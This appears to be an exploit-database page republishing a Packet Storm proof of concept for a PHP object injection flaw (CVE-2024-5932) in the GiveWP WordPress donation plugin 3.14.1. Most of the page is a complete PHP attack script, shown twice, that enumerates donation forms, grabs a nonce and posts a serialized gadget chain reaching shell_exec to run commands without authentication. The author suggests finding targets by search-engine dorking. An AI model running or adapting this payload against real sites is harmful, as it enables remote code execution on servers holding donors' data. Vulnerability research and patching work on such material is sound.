📄 WordPress GiveWP Donation 3.14.1 PHP Object Injection_PACKETSTORM:212928

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

WordPress GiveWP Donation Fundraising Platform version 3.14.1 suffers from a PHP code injection vulnerability. This script exploits a different vector than the prior submissions from this researcher...

Visit Original Source

Basic Information

ID PACKETSTORM:212928

Published Dec 17, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : GiveWP Donation 3.14.1 PHP Object Injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://givewp.com |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This PHP script demonstrates a proof-of-concept exploit for a PHP Object Injection vulnerability in the WordPress plugin GiveWP.

What the script does:

Sends AJAX requests to the WordPress admin-ajax.php endpoint using cURL.

Enumerates donation forms by calling the give_form_search action.

Selects a random form and retrieves its required nonce/hash via give_donation_form_nonce.

Builds a malicious serialized PHP payload that abuses unsafe object deserialization chains within GiveWP and its dependencies.

Injects the payload into a donation request parameter (give_title).

Triggers deserialization during donation processing (give_process_donation), aiming to execute a system command (e.g., whoami) via a gadget chain that reaches shell_exec.

Outputs the server response, which may contain command execution results if the target is vulnerable.

Impact:

Successful exploitation can lead to remote code execution (RCE) on the vulnerable WordPress server.

The attack requires no authentication if the affected AJAX actions are exposed.

(Related : https://packetstorm.news/files/id/180463/ Related CVE numbers: CVE-2024-5932 ) .

[+] Payload :

[+] Set Target : line 17

[+] Usage : php poc.php

[+] PayLoad :

<?php

// استغلال ثغرة PHP Object Injection في إضافة GiveWP لووردبريس

function send_request($url, $data) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}

$target = "http://victim-site.com"; // استبدل بعنوان الموقع المستهدف

// الحصول على قائمة النماذج
$form_list = send_request("$target/wp-admin/admin-ajax.php", "action=give_form_search");
$form_list = json_decode($form_list, true);
if (empty($form_list)) {
die("فشل في جلب قائمة النماذج.");
}

// اختيار نموذج عشوائي
$selected_form = $form_list[array_rand($form_list)];
$form_id = $selected_form['id'];

// جلب بيانات الاستغلال
$form_data = send_request("$target/wp-admin/admin-ajax.php", "action=give_donation_form_nonce&give_form_id=$form_id");
$form_data = json_decode($form_data, true);
if (!isset($form_data['data'])) {
die("فشل في جلب بيانات النموذج.");
}
$form_hash = $form_data['data'];

// تحميل الحمولة (Payload)
$payload = 'O:19:"Stripe\\StripeObject":1:{s:10:"\0*\0_values";a:1:{s:3:"foo";' .
'O:62:"Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData":1:{' .
's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\0*\0container";' .
'O:33:"Give\\Vendors\\Faker\\ValidGenerator":3:{s:12:"\0*\0validator";' .
's:10:"shell_exec";s:12:"\0*\0generator";' .
'O:34:"Give\\Onboarding\\SettingsRepository":1:{' .
's:11:"\0*\0settings";a:1:{s:8:"address1";s:'.strlen('whoami').':"whoami";}}' .
's:13:"\0*\0maxRetries";i:10;}}}}}}';

// تنفيذ الاستغلال
$data = http_build_query([
'give-form-id' => $form_id,
'give-form-hash' => $form_hash,
'give-price-id' => '0',
'give-amount' => '$10.00',
'give_first' => 'John',
'give_last' => 'Doe',
'give_email' => '[email protected]',
'give_title' => $payload,
'give-gateway' => 'offline',
'action' => 'give_process_donation'
]);

$response = send_request("$target/wp-admin/admin-ajax.php", $data);
echo "Response: \n$response\n";

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-17T16:38:17",
    "description": "WordPress GiveWP Donation Fundraising Platform version 3.14.1 suffers from a PHP code injection vulnerability. This script exploits a different vector than the prior submissions from this researcher...",
    "published": "2025-12-17T00:00:00",
    "modified": "2025-12-17T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 WordPress GiveWP Donation 3.14.1 PHP Object Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212928",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-5932"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : GiveWP Donation 3.14.1 PHP Object Injection vulnerability                                                                   |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\n    | # Vendor    : https://givewp.com                                                                                                          |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description:  This PHP script demonstrates a proof-of-concept exploit for a PHP Object Injection vulnerability in the WordPress plugin GiveWP.\n    \n    What the script does:\n    \n    Sends AJAX requests to the WordPress admin-ajax.php endpoint using cURL.\n    \n    Enumerates donation forms by calling the give_form_search action.\n    \n    Selects a random form and retrieves its required nonce/hash via give_donation_form_nonce.\n    \n    Builds a malicious serialized PHP payload that abuses unsafe object deserialization chains within GiveWP and its dependencies.\n    \n    Injects the payload into a donation request parameter (give_title).\n    \n    Triggers deserialization during donation processing (give_process_donation), aiming to execute a system command (e.g., whoami) via a gadget chain that reaches shell_exec.\n    \n    Outputs the server response, which may contain command execution results if the target is vulnerable.\n    \n    Impact:\n    \n    Successful exploitation can lead to remote code execution (RCE) on the vulnerable WordPress server.\n    \n    The attack requires no authentication if the affected AJAX actions are exposed.\n    \n    \n        (Related : https://packetstorm.news/files/id/180463/ Related CVE numbers:\tCVE-2024-5932 ) .\n    \t\n    [+] Payload : \n    \n    [+] Set Target : line 17\n    \n    [+] Usage : php poc.php \n    \n    [+] PayLoad :\n    \n    <?php\n    \n    // \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 PHP Object Injection \u0641\u064a \u0625\u0636\u0627\u0641\u0629 GiveWP \u0644\u0648\u0648\u0631\u062f\u0628\u0631\u064a\u0633\n    \n    function send_request($url, $data) {\n        $ch = curl_init();\n        curl_setopt($ch, CURLOPT_URL, $url);\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n        curl_setopt($ch, CURLOPT_POST, true);\n        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\n        curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);\n        $response = curl_exec($ch);\n        curl_close($ch);\n        return $response;\n    }\n    \n    $target = \"http://victim-site.com\"; // \u0627\u0633\u062a\u0628\u062f\u0644 \u0628\u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u0645\u0648\u0642\u0639 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\n    \n    // \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0646\u0645\u0627\u0630\u062c\n    $form_list = send_request(\"$target/wp-admin/admin-ajax.php\", \"action=give_form_search\");\n    $form_list = json_decode($form_list, true);\n    if (empty($form_list)) {\n        die(\"\u0641\u0634\u0644 \u0641\u064a \u062c\u0644\u0628 \u0642\u0627\u0626\u0645\u0629 \u0627\u0644\u0646\u0645\u0627\u0630\u062c.\");\n    }\n    \n    // \u0627\u062e\u062a\u064a\u0627\u0631 \u0646\u0645\u0648\u0630\u062c \u0639\u0634\u0648\u0627\u0626\u064a\n    $selected_form = $form_list[array_rand($form_list)];\n    $form_id = $selected_form['id'];\n    \n    // \u062c\u0644\u0628 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n    $form_data = send_request(\"$target/wp-admin/admin-ajax.php\", \"action=give_donation_form_nonce&give_form_id=$form_id\");\n    $form_data = json_decode($form_data, true);\n    if (!isset($form_data['data'])) {\n        die(\"\u0641\u0634\u0644 \u0641\u064a \u062c\u0644\u0628 \u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0646\u0645\u0648\u0630\u062c.\");\n    }\n    $form_hash = $form_data['data'];\n    \n    // \u062a\u062d\u0645\u064a\u0644 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 (Payload)\n    $payload = 'O:19:\"Stripe\\\\StripeObject\":1:{s:10:\"\\0*\\0_values\";a:1:{s:3:\"foo\";' .\n               'O:62:\"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData\":1:{' .\n               's:8:\"userInfo\";a:1:{s:7:\"address\";O:4:\"Give\":1:{s:12:\"\\0*\\0container\";' .\n               'O:33:\"Give\\\\Vendors\\\\Faker\\\\ValidGenerator\":3:{s:12:\"\\0*\\0validator\";' .\n               's:10:\"shell_exec\";s:12:\"\\0*\\0generator\";' .\n               'O:34:\"Give\\\\Onboarding\\\\SettingsRepository\":1:{' .\n               's:11:\"\\0*\\0settings\";a:1:{s:8:\"address1\";s:'.strlen('whoami').':\"whoami\";}}' .\n               's:13:\"\\0*\\0maxRetries\";i:10;}}}}}}';\n    \n    // \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n    $data = http_build_query([\n        'give-form-id' => $form_id,\n        'give-form-hash' => $form_hash,\n        'give-price-id' => '0',\n        'give-amount' => '$10.00',\n        'give_first' => 'John',\n        'give_last' => 'Doe',\n        'give_email' => '[email protected]',\n        'give_title' => $payload,\n        'give-gateway' => 'offline',\n        'action' => 'give_process_donation'\n    ]);\n    \n    $response = send_request(\"$target/wp-admin/admin-ajax.php\", $data);\n    echo \"Response: \\n$response\\n\";\n    \n    ?>\n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212928",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212928/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply